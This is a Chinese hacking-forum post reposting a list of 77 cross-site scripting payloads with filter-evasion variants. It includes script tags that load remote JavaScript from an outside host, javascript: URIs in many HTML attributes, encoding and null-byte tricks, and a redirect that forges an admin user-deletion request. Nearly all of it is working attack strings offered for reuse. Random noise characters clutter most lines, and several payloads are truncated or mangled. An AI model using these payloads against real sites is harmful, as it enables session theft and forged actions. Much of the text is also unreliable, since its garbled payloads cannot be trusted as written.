貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。. ^3 a( p. \7 w' U9 k
(1)普通的XSS JavaScript注入
9 T( `; p$ J8 C1 S<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 x- d2 V( x% r9 ~: }/ I' g. J(2)IMG标签XSS使用JavaScript命令
8 A f& D9 M3 F/ J<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- A# l, U5 H! z" P! L# N
(3)IMG标签无分号无引号
9 V# R6 ]( v. C+ [7 `) S<IMG SRC=javascript:alert(‘XSS’)>: P) S6 x) X" x2 k9 O
(4)IMG标签大小写不敏感
B* ~6 A2 U% T8 m+ I+ B, F' I<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" r- d3 y' \3 \; Z
(5)HTML编码(必须有分号)
; a. _/ W( h2 B1 D5 `8 Q( I<IMG SRC=javascript:alert(“XSS”)>4 y3 K$ Q ]2 I( v$ ?: w
(6)修正缺陷IMG标签
& K1 @0 r! v: M<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
% _6 x% }2 Q0 f4 |6 c1 c, o) N& n& I, T1 w$ ?0 m' Q6 j
; J! Z. q$ B9 ?: R6 i! q% [9 _
(7)formCharCode标签(计算器)
/ k: k0 W3 g9 w# r5 s" ]<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>3 T i; ^( T( e' ?- U5 O* i
(8)UTF-8的Unicode编码(计算器)
$ B! x5 U2 A( z$ {<IMG SRC=jav..省略..S')>
7 v0 X' f; i3 K. ?& f2 u9 ^(9)7位的UTF-8的Unicode编码是没有分号的(计算器), x, P5 W+ B$ A1 h4 ~3 y4 n: D f1 J
<IMG SRC=jav..省略..S')>' S' w" V( E6 g7 N/ ], p1 E* |
(10)十六进制编码也是没有分号(计算器)0 g/ s: I! ?; n0 x
<IMG SRC=java..省略..XSS')>4 F( O8 D/ K2 n/ K% E7 f. |
(11)嵌入式标签,将Javascript分开# M9 x0 o6 Y/ c7 m9 g
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# N/ p& U3 f9 n" V( v(12)嵌入式编码标签,将Javascript分开
+ s# q9 ~% G+ d9 J/ f9 u<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 q4 h5 t- ]- y- S* w6 q; R(13)嵌入式换行符; y5 y3 ^ Q+ k+ a- l2 J; c: _8 ^
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 W6 u2 o9 e) f! p: n* X; S1 J+ X6 D(14)嵌入式回车. I% [ ]+ G. E
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 U( d& {2 w, i8 {. J, Y+ r3 t2 E(15)嵌入式多行注入JavaScript,这是XSS极端的例子
8 u( r) W8 h% R% [$ g<IMG SRC=”javascript:alert(‘XSS‘)”>
- ^& f* x, C# Q3 ](16)解决限制字符(要求同页面)* C$ C: v7 `, W5 s" r$ |
<script>z=’document.’</script>) s; P1 O7 P1 W' d8 E& v9 a5 v
<script>z=z+’write(“‘</script>
/ M: T0 j( H/ c& X% ]7 b6 Q<script>z=z+’<script’</script>
. G- b. V6 ^% F+ F2 m( R' S<script>z=z+’ src=ht’</script>) X/ X" r7 v; w4 q
<script>z=z+’tp://ww’</script>6 c" i' T$ k0 ]9 W6 q M
<script>z=z+’w.shell’</script>* c+ H) j6 S5 q, H- Z; z3 G
<script>z=z+’.net/1.’</script>
% o9 M. t% k) a2 H& t. h: f3 ?<script>z=z+’js></sc’</script>9 ]7 j9 b6 O! K( M. v. y
<script>z=z+’ript>”)’</script>$ d/ d/ p$ G; p. O/ N& g# V! b
<script>eval_r(z)</script>
. k4 P3 o E- A/ s+ q7 p$ q1 T(17)空字符12-7-1 T00LS - Powered by Discuz! Board! m* u% b$ R2 |7 u) k7 u
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
8 j: I) H. B k: A$ s3 R* Sperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 {& @! K. a! [0 `(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
" E& u6 B7 r \& Dperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
5 x. r, x% O m' _; H(19)Spaces和meta前的IMG标签* ?8 t8 o" Z% I
<IMG SRC=” javascript:alert(‘XSS’);”>
" {- Z! g* @5 B8 p(20)Non-alpha-non-digit XSS" X5 ^1 {1 b+ f% l
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: [6 A( C/ @" {; Z- @$ s" B(21)Non-alpha-non-digit XSS to 2$ I* ^! W2 w4 i/ h6 S8 F# Z
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
+ Y' E* j* g) R& ~' D(22)Non-alpha-non-digit XSS to 3
3 W. G3 x5 A6 N6 K1 Z<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" N" x* ~5 q* I' S1 z; y(23)双开括号/ u1 e) o! c' ~3 ~8 Y6 r3 a
<<SCRIPT>alert(“XSS”);//<</SCRIPT>* ]: w- Y; `6 M! s$ [
(24)无结束脚本标记(仅火狐等浏览器)( e# H/ A1 y1 }
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ b1 }0 Z9 r* C
(25)无结束脚本标记2+ P7 V/ ~9 z$ u- |
<SCRIPT SRC=//3w.org/XSS/xss.js>
5 [4 D: u7 D. v8 w+ ?8 w(26)半开的HTML/JavaScript XSS/ D) t* M7 c% _1 D
<IMG SRC=”javascript:alert(‘XSS’)”& D1 g* ]- K. ^' e% x- r$ n
(27)双开角括号8 k! X; ?3 e( Z, ^: ?: O2 h
<iframe src=http://3w.org/XSS.html <
$ s- u2 n( ^' p6 e2 L(28)无单引号 双引号 分号" k h4 \& i! Q: H3 q' u2 N" z
<SCRIPT>a=/XSS/
}8 m9 Q$ ?- H$ nalert(a.source)</SCRIPT>5 K& `9 G) s$ F9 p) {, f7 q7 X( L7 L
(29)换码过滤的JavaScript
9 ^; O3 u0 i; a1 o+ i1 g\”;alert(‘XSS’);//9 i% Q, s3 W5 I2 d, o
(30)结束Title标签) c. |$ D- u) Z5 I
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
) p, p9 I9 x& E1 p(31)Input Image
/ H( B9 I- f+ x" C<INPUT SRC=”javascript:alert(‘XSS’);”>$ H+ W1 s3 ]0 M- |$ N; a& m
(32)BODY Image' f v+ U+ r' E% b& i
<BODY BACKGROUND=”javascript:alert(‘XSS’)”># {+ ~5 y$ @- _
(33)BODY标签
+ K! ^/ J5 ^9 w; A<BODY(‘XSS’)>
0 t# Q; k" P2 H6 [! q( R(34)IMG Dynsrc
# e+ m$ _- A$ _- s8 D/ c3 L2 w<IMG DYNSRC=”javascript:alert(‘XSS’)”>
e u5 {3 u3 Z* J: l) A(35)IMG Lowsrc3 V% U$ d. n9 m! I$ G0 V" R& v7 T
<IMG LOWSRC=”javascript:alert(‘XSS’)”>$ X3 {, `+ v5 b/ g
(36)BGSOUND& z0 Y# a" A( b$ L( D" A9 }
<BGSOUND SRC=”javascript:alert(‘XSS’);”>: s: p1 K4 {9 Y0 l& q5 M, Q
(37)STYLE sheet: D$ x2 ]; k/ T( x1 m) I
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>( F& M7 h' D Y. N+ k. h4 i' m
(38)远程样式表
! @/ H* w2 K% E<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>. I; ^ t1 p/ x- x" s* d3 u: A. {
(39)List-style-image(列表式)& }! R U3 L$ K4 c9 h
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- N6 d5 i2 L/ H& I( J(40)IMG VBscript
. O& c; H, Y( @0 X<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 f* `$ X2 q `% d( ^: H- r: ?(41)META链接url
1 ^1 ?! k7 j' p1 z0 N' U- \9 Z0 q: Q: _; `; i1 F0 r
0 ^+ v+ D0 z9 \+ s: B* o1 O' w4 Y
<META HTTP-EQUIV=”refresh” CONTENT=”0;8 p6 P% C! x. L) _9 r
URL=http://;URL=javascript:alert(‘XSS’);”>* |( q& r* q1 Q6 D6 ~6 k
(42)Iframe! k; `$ }/ I" N7 d) M
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>. A& z) ]* z/ ]* H. T! R! l
(43)Frame2 ~/ c4 O9 ^) ~8 U! a w
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
+ Z. O+ U9 c+ S( {https://www.t00ls.net/viewthread ... table&tid=15267 3/6
3 `( R% v# @5 V, ?& ?(44)Table
/ z4 A4 J3 N, ]4 C<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
9 r O& j7 F8 m8 z(45)TD
% k7 G. t, q0 ?+ V9 m' O$ y<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>, ~, x. g: Q" C/ r ^( |
(46)DIV background-image
: R4 q/ S2 k. _ h* \<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* V2 V1 | e, V- O* a(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-. f& t/ S* v, M! ~6 d) f: y7 D
8&13&12288&65279): D7 _+ S& f" R
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ W# Z0 T2 }/ {3 V$ p5 l+ i1 U2 I! z
(48)DIV expression
4 Y" j2 F5 U! [- |. q3 B/ K<DIV STYLE=”width: expression_r(alert(‘XSS’));”># z4 e- _0 u) ?1 q
(49)STYLE属性分拆表达2 i( s i) ~3 W& l
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
& T r$ ]/ V& Y(50)匿名STYLE(组成:开角号和一个字母开头)3 B2 f9 V. L+ x/ _
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>- K3 l& A) v% {
(51)STYLE background-image
3 k" M1 s: A0 z* b+ I; v+ t1 B<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A3 x; B, A' H1 b$ T3 F' `. r
CLASS=XSS></A>
9 Q7 q9 s5 j) @% w(52)IMG STYLE方式
; C3 Q4 X! {8 r2 R2 i& F& N( jexppression(alert(“XSS”))’>! \0 h8 z' V9 A: }3 S
(53)STYLE background& ]) |, s0 g1 R2 f2 F
<STYLE><STYLE
/ G& [( _5 S" B2 T! G/ l9 L4 [8 Vtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! l' ~7 Q; f+ L(54)BASE' x9 K; D7 Z" f# w l% W
<BASE HREF=”javascript:alert(‘XSS’);//”>1 R( S- Y0 d- r5 A; T
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
1 U0 \5 g& T3 Q, |9 a8 S5 `<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
8 y1 Z3 y( x( V: d% g7 B(56)在flash中使用ActionScrpt可以混进你XSS的代码+ a7 b. P: v8 J
a=”get”;
5 Z# y, p: m. t5 Rb=”URL(\”";6 t# c0 g( i6 q; X% p" i" [+ f
c=”javascript:”;
2 [! l, s0 E G0 j6 G- T0 kd=”alert(‘XSS’);\”)”;
3 B" V+ E; I* Y3 B8 [" z1 ^6 Eeval_r(a+b+c+d);! z1 b6 i ^; c
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 r6 t2 g1 c9 [& a' d<HTML xmlns:xss>
4 _% f1 @( \1 T6 q6 L! B* s) X/ | T<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
3 n( ?4 W7 n; K7 m; @8 {<xss:xss>XSS</xss:xss>/ k4 x% q/ o/ r, r- b
</HTML>! n4 W8 x7 a* f+ s D a2 l, E
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用* ?+ H- h' k! j0 `$ l% E: G6 x7 c
<SCRIPT SRC=””></SCRIPT>% L' ~- }6 w$ F9 X& y5 O
(59)IMG嵌入式命令,可执行任意命令1 ?* @; \: s, p( [: z" o/ m5 I
<IMG SRC=”http://www.XXX.com/a.php?a=b”>; Q6 T' N$ I1 S4 L# W9 K
(60)IMG嵌入式命令(a.jpg在同服务器)% ?- f) I# t& l0 n5 P2 a
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser* x9 f) C4 y& x9 A/ G
(61)绕符号过滤
8 z; ^. b3 \4 R<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# S( A6 Q, H& A3 P(62)
+ h/ D6 @/ C: C6 L) e4 i<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* D- w2 q+ R `0 h/ D0 N(63)
4 o5 w9 T ?& {2 C4 |4 e<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# O- Y5 H2 b' d! M2 U(64)
# X C; J9 }( C% k5 c/ l<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
# o( T* \. t' s- M(65)
& F; { s8 P1 G, x2 j<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
% Y) v; S J- u2 q9 U(66)12-7-1 T00LS - Powered by Discuz! Board
+ e, c8 ^& i0 N N- [+ Ohttps://www.t00ls.net/viewthread ... table&tid=15267 4/63 m+ ?3 E1 V- F. K0 w/ @; t
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>; f& v, s! E2 [. y+ v _% V4 k
(67)
" ?6 b0 w! `* g+ O6 ~<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
/ ^8 g" c+ {, i" H% n</SCRIPT>
2 t- R& l4 g: m }$ f0 J6 ~, d(68)URL绕行
0 P1 A. M0 {2 n9 M0 |; {<A HREF=”http://127.0.0.1/”>XSS</A>
: p7 s) q6 ~' @- v9 N5 t( g8 W(69)URL编码4 A$ O+ G9 m8 u5 {( Y5 e6 s
<A HREF=”http://3w.org”>XSS</A>! b" } ~- i7 q( L4 L/ i
(70)IP十进制- E3 I- N8 ?" u* \- b
<A HREF=”http://3232235521″>XSS</A>
$ ]6 h4 j8 R/ t! `% q3 N(71)IP十六进制
% E5 k8 ]* k7 X<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 d0 W. c& d( H. |, `. _(72)IP八进制
/ |, @( i; V2 m% @+ J, N<A HREF=”http://0300.0250.0000.0001″>XSS</A>6 G6 v$ M$ k0 [2 c- G+ W: x: I2 E
(73)混合编码 |) e) M- `. s' n9 ?1 P
<A HREF=”h
! _3 I8 T {4 ^tt p://6 6.000146.0×7.147/”">XSS</A>
0 Y y3 G6 E* @1 }" w$ k(74)节省[http:]3 h: m. [- \) ~2 r
<A HREF=”//www.google.com/”>XSS</A>
" j6 V# g! G& y(75)节省[www]
: r" h0 v4 t* @8 v# O; [<A HREF=”http://google.com/”>XSS</A>" j' w* G0 U) [) {+ s l
(76)绝对点绝对DNS
# j5 }: Y- G. }) n" H3 o<A HREF=”http://www.google.com./”>XSS</A>
# c2 R7 i6 T! j(77)javascript链接 i$ {2 Z% R8 @$ R+ A/ F& P7 y" S
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>) f9 k- U3 |: d% {
* g) |) m1 P; N9 B4 J# \* q
原文地址:http://fuzzexp.org/u/0day/?p=147 Y4 _) x+ m/ t8 }- Y5 Y- z9 Q
) x d$ Q" \* |& ~: W; g
|
发表于 2013-4-19 19:22:37
收藏
支持
反对